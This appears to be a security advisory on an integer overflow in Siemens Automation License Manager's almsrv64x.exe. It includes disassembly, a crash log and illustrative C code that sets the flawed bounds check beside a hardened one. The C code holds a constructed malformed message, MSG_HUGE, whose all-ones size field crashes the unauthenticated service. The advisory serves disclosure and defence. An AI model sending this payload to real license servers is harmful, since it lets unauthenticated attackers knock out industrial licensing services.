An int64 overflow vulnerability exists in Siemens Automation License Manager (ALM) almsrv64x.exe v602.1.0.1. An unauthenticated remote attacker can exploit it to crash the process.
almsrv64x.exe listens on TCP port 4410 by default and processes licensing messages with the following format:
// be = big endian
struct order_msg
{
    header hdr;
    body bd;
};
struct header
{
    be32 OrderCode; // order command code
    be32 OrderSize; // size of order (msg) data
};
struct body
{
    byte size[];     // data size encoded in a variable number of bytes;
                     // the all-ones value at each width escapes to the next wider field:
                     //   0 - 0xfe                          b1
                     //   0xff - 0xfffe                     ff b1 b2
                     //   0xffff - 0xfffffffe               ff ff ff b1 b2 b3 b4
                     //   0xffffffff - 0xffffffffffffffff   ff ff ff ff ff ff ff b1 b2 b3 b4 b5 b6 b7 b8
    byte data[size]; // XML data
};
almsrv64x.exe has a function (CSocketStream_EnsureNbytesInBuf) that checks whether the requested body size, added to the current stream position, still fits within the allocated buffer. If it does, the function returns normally; otherwise, an exception is thrown:
[...]
.text:00007FF7F6D83ED0 sub rsp, 48h
.text:00007FF7F6D83ED4 rdx = size
.text:00007FF7F6D83ED4 add rdx, [rcx+CSocketStream.pos] ; VULN: rdx = 0xffffffffffffffff ->
.text:00007FF7F6D83ED4 ; int64 overflow
.text:00007FF7F6D83ED8 cmp rdx, [rcx+CSocketStream.AllocSize]
.text:00007FF7F6D83EDC ja short loc_7FF7F6D83EE3
.text:00007FF7F6D83EDE add rsp, 48h
.text:00007FF7F6D83EE2 retn
.text:00007FF7F6D83EE3 ; ---------------------------------------------------------------------------
.text:00007FF7F6D83EE3
.text:00007FF7F6D83EE3 loc_7FF7F6D83EE3: ; CODE XREF: CSocketStream_EnsureNbytesInBuf+C↑j
.text:00007FF7F6D83EE3 lea rdx, aCmemstreamTrie_0 ; "CMemStream - tried to read behind buffe"...
.text:00007FF7F6D83EEA lea rcx, [rsp+48h+pExceptionObject]
.text:00007FF7F6D83EEF call sub_7FF7F6D52F90
.text:00007FF7F6D83EF4 lea rdx, __TI3?AVout_of_range@std@@ ; pThrowInfo
.text:00007FF7F6D83EFB lea rcx, [rsp+48h+pExceptionObject] ; pExceptionObject
.text:00007FF7F6D83F00 call _CxxThrowException
[...]
If the attacker specifies a body size of 0xffffffffffffffff, adding that size to the stream position in the check function wraps around (an int64 overflow) to a small value, so the comparison against AllocSize passes and the check is bypassed. The XML processing function is then led to believe that the XML data is 0xffffffffffffffff bytes long and reads past the end of the buffer, which results in a memory read access violation that terminates the almsrv64x.exe process:
(318.19f4): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
rax=00000000fffffff7 rbx=ffffffffffffffff rcx=00007ff7f6d86f5e
rdx=0000000000000005 rsi=0000000000000000 rdi=000001e0e04e306f
rip=00007ff7f6d86e04 rsp=000000d9dc7fccd0 rbp=00000000ffffffff
r8=0000000002488f91 r9=0000000002488f91 r10=0000000000000000
r11=000000d9dc7fcb60 r12=00007ff7f6b80000 r13=0000000000000005
r14=000000d9dc7fdc68 r15=0000000000000002
iopl=0 nv up ei pl nz ac pe cy
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010213
almsrv64x+0x206e04:
00007ff7`f6d86e04 410fbe0438 movsx eax,byte ptr [r8+rdi] ds:000001e0`e296c000=??
[...]
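As an added illustration, not code from this advisory or from Siemens: the C below decodes the escaped size field described above and places the check as compiled in the binary (an addition that can wrap) next to a hardened form that compares against the remaining space instead. The function names, the sample messages and the 64-byte buffer size are constructed for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

struct decoded { size_t consumed; uint64_t value; };   /* consumed == 0 means truncated */

/* Decode the escaped size field: read 1, then 2, then 4, then 8 big-endian bytes,
 * stopping at the first field that is not the all-ones escape value for its width. */
struct decoded decode_body_size(const uint8_t *p, size_t avail) {
    struct decoded d = { 0, 0 };
    size_t off = 0;
    for (size_t width = 1; width <= 8; width *= 2) {
        if (off + width > avail) return d;                 /* truncated input */
        uint64_t v = 0;
        for (size_t i = 0; i < width; i++) v = (v << 8) | p[off + i];
        off += width;
        uint64_t escape = (width == 8) ? 0 : (1ULL << (8 * width)) - 1;
        if (width == 8 || v != escape) { d.consumed = off; d.value = v; return d; }
    }
    return d;                                              /* not reached */
}

/* The check as compiled in almsrv64x.exe: pos + size wraps for huge sizes. */
bool ensure_bytes_vulnerable(uint64_t pos, uint64_t size, uint64_t alloc) {
    return pos + size <= alloc;
}

/* Hardened form: compare against the remaining space, which cannot wrap. */
bool ensure_bytes_safe(uint64_t pos, uint64_t size, uint64_t alloc) {
    return pos <= alloc && size <= alloc - pos;
}

/* Walk one message: 8-byte header, size field, then the bounds check on the data.
 * Returns 1 if the body is accepted, 0 if rejected, -1 if the message is malformed. */
int check_message(const uint8_t *msg, size_t len, uint64_t alloc, bool hardened) {
    if (len < 8) return -1;
    struct decoded d = decode_body_size(msg + 8, len - 8);
    if (d.consumed == 0) return -1;
    uint64_t pos = 8 + d.consumed;                          /* stream position after the size field */
    bool ok = hardened ? ensure_bytes_safe(pos, d.value, alloc)
                       : ensure_bytes_vulnerable(pos, d.value, alloc);
    return ok ? 1 : 0;
}

/* Constructed samples (not captured traffic); OrderCode=1, OrderSize=body length. */
static const uint8_t MSG_SMALL[] = { 0,0,0,1, 0,0,0,6, 0x05, 'a','b','c','d','e' };
static const uint8_t SIZE_2B[]   = { 0xff, 0xff, 0x00 };   /* 0xff00, needs the 2-byte form */
static const uint8_t MSG_HUGE[]  = { 0,0,0,1, 0,0,0,15, 0xff,0xff,0xff,0xff,0xff,0xff,0xff,
                                     0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff };   /* size 2^64-1 */
```

With a 64-byte buffer, the compiled form accepts MSG_HUGE because 23 + 0xffffffffffffffff wraps to 22, while the hardened form rejects it.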